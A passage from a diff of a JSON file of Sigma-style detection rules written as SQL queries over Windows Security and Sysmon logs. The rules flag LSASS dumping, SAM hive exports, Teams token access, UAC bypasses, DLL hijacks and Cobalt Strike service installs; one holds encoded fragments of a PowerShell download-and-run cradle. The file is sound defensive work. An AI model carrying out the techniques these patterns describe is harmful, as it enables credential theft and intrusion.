locations", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", "attack.persistence", - "attack.t1546.003" + "attack.execution", + "attack.t1053" ], "falsepositives": [ - "SCCM" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4624' AND LogonType = '3' AND ProcessName LIKE '%scrcons.exe' ESCAPE '\\') AND NOT (TargetLogonId = '0x3e7'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\System32\\\\Tasks%' ESCAPE '\\' AND (Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR Image LIKE '%C:\\\\PerfLogs%' ESCAPE '\\' OR Image LIKE '%\\\\Windows\\\\System32\\\\config\\\\systemprofile%' ESCAPE '\\'))" ], - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml" + "filename": "file_event_win_susp_task_write.yml" }, { - "title": "OilRig APT Schedule Task Persistence - Security", - "id": "c0580559-a6bd-4ef6-b9b7-83703d98b561", + "title": "PowerShell Profile Modification", + "id": "b5b78988-486d-4a80-b991-930eff3ff8bf", "status": "test", - "description": "Detects OilRig schedule task persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence", + "author": "HieuTT35, Nasreddine Bencherchali", "tags": [ "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.privilege_escalation", + "attack.t1546.013" ], "falsepositives": [ - "Unlikely" + "System administrator creating Powershell profile manually" ], - "level": 
"critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4698' AND TaskName IN ('SC Scheduled Scan', 'UpdatMachine'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (TargetFilename LIKE '%\\\\Microsoft.PowerShell\\_profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WindowsPowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\PowerShell\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\profile.ps1' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Program Files\\\\PowerShell\\\\7\\\\profile.ps1' ESCAPE '\\'))" ], - "filename": "win_security_apt_oilrig_mar18.yml" + "filename": "file_event_win_susp_powershell_profile.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - Security", - "id": "1a0a2ff1-611b-4dac-8216-8a7b47c618a6", + "title": "Suspicious File Event With Teams Objects", + "id": "6902955a-01b7-432c-b32a-6f5f81d8f624", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", + "author": "@SerkinValery", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ServiceFileName LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Cookies%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Microsoft\\\\Teams\\\\Local Storage\\\\leveldb%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe%' ESCAPE '\\'))" ], - 
"filename": "win_security_invoke_obfuscation_via_use_clip_services_security.yml" + "filename": "file_event_win_access_susp_teams.yml" }, { - "title": "Replay Attack Detected", - "id": "5a44727c-3b85-4713-8c44-4401d5499629", - "status": "experimental", - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "author": "frack113", + "title": "Suspicious Outlook Macro Created", + "id": "117d3d3a-755c-4a61-b23e-9171146d094c", + "status": "test", + "description": "Detects the creation of a macro file for Outlook.", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4649')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND TargetFilename LIKE '%\\\\Microsoft\\\\Outlook\\\\VbaProject.OTM' ESCAPE '\\' AND NOT (Image LIKE '%\\\\outlook.exe' ESCAPE '\\'))" ], - "filename": "win_security_replay_attack_detected.yml" + "filename": "file_event_win_office_outlook_susp_macro_creation.yml" }, { - "title": "CobaltStrike Service Installations - Security", - "id": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", + "title": "UAC Bypass Using Consent and Comctl32 - File", + "id": "62ed5b55-f991-406a-85d9-e8e8fdf18789", "status": "test", - "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", - "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", + "description": "Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.execution", + "attack.defense_evasion", 
"attack.privilege_escalation", - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND ((ServiceFileName LIKE '%ADMIN$%' ESCAPE '\\' AND ServiceFileName LIKE '%.exe%' ESCAPE '\\') OR (ServiceFileName LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ServiceFileName LIKE '%start%' ESCAPE '\\' AND ServiceFileName LIKE '%powershell%' ESCAPE '\\') OR ServiceFileName LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR (ServiceFileName LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ServiceFileName LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ServiceFileName LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.@%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\comctl32.dll' ESCAPE '\\')" ], - "filename": "win_security_cobaltstrike_service_installs.yml" + "filename": "file_event_win_uac_bypass_consent_comctl32.yml" }, { - "title": "AD Privileged Users or Groups Reconnaissance", - "id": "35ba1d85-724d-42a3-889f-2e2362bcaf23", + "title": "Suspicious Binary Writes Via AnyDesk", + "id": "2d367498-5112-4ae5-a06a-96e7bc33a211", "status": "experimental", - "description": "Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs", - "author": "Samir Bousseaden", + "description": "Detects AnyDesk writing binary files to disk other than \"gcapi.dll\".\nAccording to RedCanary research it is highly abnormal for AnyDesk to write executable files to disk besides gcapi.dll,\nwhich is a legitimate DLL that is part 
of the Google Chrome web browser used to interact with the Google Cloud API. (See reference section for more details)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1087.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "If source account name is not an admin then its super suspicious" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4661' AND (ObjectType LIKE 'SAM\\_USER' ESCAPE '\\' OR ObjectType LIKE 'SAM\\_GROUP' ESCAPE '\\')) AND ((ObjectName LIKE '%-512' ESCAPE '\\' OR ObjectName LIKE '%-502' ESCAPE '\\' OR ObjectName LIKE '%-500' ESCAPE '\\' OR ObjectName LIKE '%-505' ESCAPE '\\' OR ObjectName LIKE '%-519' ESCAPE '\\' OR ObjectName LIKE '%-520' ESCAPE '\\' OR ObjectName LIKE '%-544' ESCAPE '\\' OR ObjectName LIKE '%-551' ESCAPE '\\' OR ObjectName LIKE '%-555' ESCAPE '\\') OR ObjectName LIKE '%admin%' ESCAPE '\\')) AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\anydesk.exe' ESCAPE '\\' AND (TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.exe' ESCAPE '\\')) AND NOT ((TargetFilename LIKE '%\\\\gcapi.dll' ESCAPE '\\')))" ], - "filename": "win_security_account_discovery.yml" + "filename": "file_event_win_anydesk_writing_susp_binaries.yml" }, { - "title": "PowerShell Scripts Installed as Services - Security", - "id": "2a926e6a-4b81-4011-8a96-e36cc8c04302", + "title": "Dumpert Process Dumper Default File", + "id": "93d94efc-d7ad-4161-ad7d-1638c4f908d8", "status": "test", - "description": "Detects powershell script installed as a Service", - "author": "oscd.community, Natalia Shornikova", + "description": "Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - 
"attack.t1569.002" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Very unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4697' AND (ServiceFileName LIKE '%powershell%' ESCAPE '\\' OR ServiceFileName LIKE '%pwsh%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE 'C:\\\\Windows\\\\Temp\\\\dumpert.dmp' ESCAPE '\\')" ], - "filename": "win_security_powershell_script_installed_as_service.yml" + "filename": "file_event_win_hktl_dumpert.yml" }, { - "title": "Hidden Local User Creation", - "id": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", + "title": "Potential DCOM InternetExplorer.Application DLL Hijack", + "id": "2f7979ae-f82b-45af-ac1d-2b10e93b0baa", "status": "test", - "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", - "author": "Christian Burkard (Nextron Systems)", + "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class over the network", + "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1021.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4720' AND TargetUserName LIKE '%$' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image = 'System' AND TargetFilename LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" ], - "filename": "win_security_hidden_user_creation.yml" + "filename": "file_event_win_dcom_iertutil_dll_hijack.yml" }, { - "title": "Possible Impacket SecretDump Remote Activity", - "id": 
"252902e3-5830-4cf6-bf21-c22083dfd5cf", - "status": "experimental", - "description": "Detect AD credential dumping using impacket secretdump HKTL", - "author": "Samir Bousseaden, wagga", + "title": "UAC Bypass Using IEInstal - File", + "id": "bdd8157d-8e85-4397-bb82-f06cc9c71dbb", + "status": "test", + "description": "Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.003" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '5145' AND ShareName LIKE '\\\\\\\\\\*\\\\ADMIN$' ESCAPE '\\' AND RelativeTargetName LIKE '%SYSTEM32\\\\%' ESCAPE '\\' AND RelativeTargetName LIKE '%.tmp%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\IEInstal.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%consent.exe' ESCAPE '\\')" ], - "filename": "win_security_impacket_secretdump.yml" + "filename": "file_event_win_uac_bypass_ieinstal.yml" }, { - "title": "T1047 Wmiprvse Wbemcomn DLL Hijack", - "id": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", - "status": "test", - "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", + "title": "ISO File Created Within Temp Folders", + "id": "2f9356ae-bf43-41b8-b858-4496d83b2acb", + "status": "experimental", + "description": "Detects the creation of a ISO file in the Outlook temp folder or in the Appdata temp 
folder. Typical of Qakbot TTP from end-July 2022.", + "author": "@sam0x90", "tags": [ - "attack.execution", - "attack.t1047", - "attack.lateral_movement", - "attack.t1021.002" + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unknown" + "Potential FP by sysadmin opening a zip file containing a legitimate ISO file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5145' AND RelativeTargetName LIKE '%\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT (SubjectUserName LIKE '%$' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.zip\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\') OR (TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\Content.Outlook\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.iso' ESCAPE '\\')))" ], - "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml" + "filename": "file_event_win_iso_file_mount.yml" }, { - "title": "Enabled User Right in AD to Control User Objects", - "id": "311b6ce2-7890-4383-a8c2-663a9f6b43cd", - "status": "test", - "description": "Detects scenario where if a user is assigned the SeEnableDelegationPrivilege right in Active Directory it would allow control of other AD user objects.", - "author": "@neu5ron", + "title": "Creation of an WerFault.exe in Unusual Folder", + "id": "28a452f3-786c-4fd8-b8f2-bddbe9d616d1", + "status": "experimental", + "description": "Detects WerFault copoed to a suspicious folder, which could be a sign of WerFault DLL hijacking", + "author": "frack113", "tags": [ "attack.persistence", - "attack.t1098" + "attack.defense_evasion", + "attack.t1574.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4704' AND PrivilegeList LIKE 
'%SeEnableDelegationPrivilege%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetFilename LIKE '%\\\\WerFault.exe' ESCAPE '\\' OR TargetFilename LIKE '%\\\\wer.dll' ESCAPE '\\') AND NOT ((TargetFilename LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SysWOW64\\\\%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\WinSxS\\\\%' ESCAPE '\\')))" ], - "filename": "win_security_alert_active_directory_user_control.yml" + "filename": "file_event_win_werfault_dll_hijacking.yml" }, { - "title": "RDP Login from Localhost", - "id": "51e33403-2a37-4d66-a574-1fda1782cc31", + "title": "Typical HiveNightmare SAM File Export", + "id": "6ea858a8-ba71-4a12-b2cc-5d83312404c7", "status": "test", - "description": "RDP login with localhost source address may be a tunnelled login", - "author": "Thomas Patzke", + "description": "Detects files written by the different tools that exploit HiveNightmare", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" + "attack.credential_access", + "attack.t1552.001", + "cve.2021.36934" ], "falsepositives": [ - "Unknown" + "Files that accidentally contain these strings" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4624' AND LogonType = '10' AND IpAddress IN ('::1', '127.0.0.1'))" + "SELECT * FROM logs WHERE ((EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((TargetFilename LIKE '%\\\\hive\\_sam\\_%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2021-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2022-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-2023-%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\SAM-haxx%' ESCAPE '\\' OR TargetFilename LIKE '%\\\\Sam.save%' ESCAPE '\\') OR TargetFilename LIKE 'C:\\\\windows\\\\temp\\\\sam' ESCAPE '\\'))" ], - "filename": "win_security_rdp_localhost_login.yml" + "filename": 
"file_event_win_hktl_hivenightmare_file_exports.yml" }, { - "title": "Suspicious Computer Account Name Change CVE-2021-42287", - "id": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "status": "test", - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Startup Folder Persistence", + "id": "28208707-fe31-437f-9a7f-4b1108b94d2e", + "status": "experimental", + "description": "Detects when a file with a suspicious extension is created in the startup folder", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], "falsepositives": [ - "Unknown" + "Rare legitimate usage of some of the extensions mentioned in the rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '4781' AND OldTargetUserName LIKE '%$%' ESCAPE '\\') AND NOT (NewTargetUserName LIKE '%$%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\' AND (TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.vbe' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.hta' ESCAPE '\\' OR TargetFilename LIKE '%.dll' ESCAPE '\\' OR TargetFilename LIKE '%.jar' ESCAPE '\\' OR TargetFilename LIKE '%.msi' ESCAPE '\\' OR TargetFilename LIKE '%.scr' ESCAPE '\\' OR TargetFilename LIKE '%.cmd' ESCAPE '\\'))" ], - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml" + "filename": "file_event_win_susp_startup_folder_persistence.yml" }, { - "title": "SysKey Registry Keys Access", - "id": "9a4ff3b8-6187-4fd2-8e8b-e0eae1129495", - "status": "test", - "description": "Detects handle requests and access 
operations to specific registry keys to calculate the SysKey", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "title": "UAC Bypass Using IDiagnostic Profile - File", + "id": "48ea844d-19b1-4642-944e-fe39c2cc1fec", + "status": "experimental", + "description": "Detects the creation of a file by \"dllhost.exe\" in System32 directory part of \"IDiagnosticProfileUAC\" UAC bypass technique", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1012" + "attack.execution", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID IN ('4656', '4663') AND ObjectType = 'key' AND (ObjectName LIKE '%lsa\\\\JD' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\GBG' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Skew1' ESCAPE '\\' OR ObjectName LIKE '%lsa\\\\Data' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND TargetFilename LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' AND TargetFilename LIKE '%.dll' ESCAPE '\\')" ], - "filename": "win_security_syskey_registry_access.yml" + "filename": "file_event_win_uac_bypass_idiagnostic_profile.yml" }, { - "title": "Suspicious Outbound Kerberos Connection - Security", - "id": "eca91c7c-9214-47b9-b4c5-cb1d7e4f2350", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Malicious DLL File Dropped in the Teams or OneDrive Folder", + "id": "1908fcc1-1b92-4272-8214-0fbaf2fa5163", + "status": "experimental", + "description": "Detects creation of a malicious DLL file in the location where the OneDrive or Team applications\nUpon execution of the Teams or OneDrive 
application, the dropped malicious DLL file (“iphlpapi.dll”) is sideloaded\n", + "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1558.003" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ - "Web Browsers" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND (EventID = '5156' AND DestPort = '88') AND NOT (((Application LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Application LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%iphlpapi.dll%' ESCAPE '\\' AND TargetFilename LIKE '%\\\\AppData\\\\Local\\\\Microsoft%' ESCAPE '\\')" ], - "filename": "win_security_susp_outbound_kerberos_connection.yml" + "filename": "file_event_win_iphlpapi_dll_sideloading.yml" }, { - "title": "Register new Logon Process by Rubeus", - "id": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "status": "test", - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", + "title": "Legitimate Application Dropped Script", + "id": "7d604714-e071-49ff-8726-edeb95a70679", + "status": "experimental", + "description": "Detects programs on a Windows system that should not write scripts to disk", + "author": "frack113, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ 
"Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND EventID = '4611' AND LogonProcessName = 'User32LogonProcesss')" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR Image LIKE '%\\\\wordview.exe' ESCAPE '\\' OR Image LIKE '%\\\\certutil.exe' ESCAPE '\\' OR Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR Image LIKE '%\\\\CertReq.exe' ESCAPE '\\' OR Image LIKE '%\\\\Desktopimgdownldr.exe' ESCAPE '\\' OR Image LIKE '%\\\\esentutl.exe' ESCAPE '\\' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\' OR Image LIKE '%\\\\AcroRd32.exe' ESCAPE '\\' OR Image LIKE '%\\\\RdrCEF.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\hh.exe' ESCAPE '\\') AND (TargetFilename LIKE '%.ps1' ESCAPE '\\' OR TargetFilename LIKE '%.bat' ESCAPE '\\' OR TargetFilename LIKE '%.vbs' ESCAPE '\\' OR TargetFilename LIKE '%.scf' ESCAPE '\\' OR TargetFilename LIKE '%.wsf' ESCAPE '\\' OR TargetFilename LIKE '%.wsh' ESCAPE '\\'))" ], - "filename": "win_security_register_new_logon_process_by_rubeus.yml" + "filename": "file_event_win_legitimate_app_dropping_script.yml" }, { - "title": "ADCS Certificate Template Configuration Vulnerability with Risky EKU", - "id": "bfbd3291-de87-4b7c-88a2-d6a5deb28668", + "title": "CVE-2021-1675 Print Spooler Exploitation Filename Pattern", + "id": "2131cfb3-8c12-45e8-8fa0-31f5924e9f07", "status": "test", - "description": "Detects certificate creation with template allowing risk permission subject and risky EKU", - "author": "Orlinum , BlueDefenZer", + "description": "Detects the default filename used in PoC 
code against print spooler vulnerability CVE-2021-1675", + "author": "Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.privilege_escalation", - "attack.credential_access" + "attack.resource_development", + "attack.t1587", + "cve.2021.1675" ], "falsepositives": [ - "Administrator activity", - "Proxy SSL certificate with subject modification", - "Smart card enrollement" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'Security' AND ((EventID = '4898' AND (TemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR TemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR TemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND TemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\') OR (EventID = '4899' AND (NewTemplateContent LIKE '%1.3.6.1.5.5.7.3.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.5.2.3.4%' ESCAPE '\\' OR NewTemplateContent LIKE '%1.3.6.1.4.1.311.20.2.2%' ESCAPE '\\' OR NewTemplateContent LIKE '%2.5.29.37.0%' ESCAPE '\\') AND NewTemplateContent LIKE '%CT\\_FLAG\\_ENROLLEE\\_SUPPLIES\\_SUBJECT%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '11' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetFilename LIKE '%C:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\old\\\\1\\\\123%' ESCAPE '\\')" ], - "filename": "win_security_adcs_certificate_template_configuration_vulnerability_eku.yml" + "filename": "file_event_win_cve_2021_1675_printspooler.yml" }, { - "title": "ETW Logging Disabled In .NET Processes - Registry", - "id": "a4c90ea1-2634-4ca0-adbb-35eae169b6fc", + "title": "Potential Winnti Dropper Activity", + "id": "130c9e58-28ac-4f83-8574-0a4cc913b97e", "status": "test", - "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": 
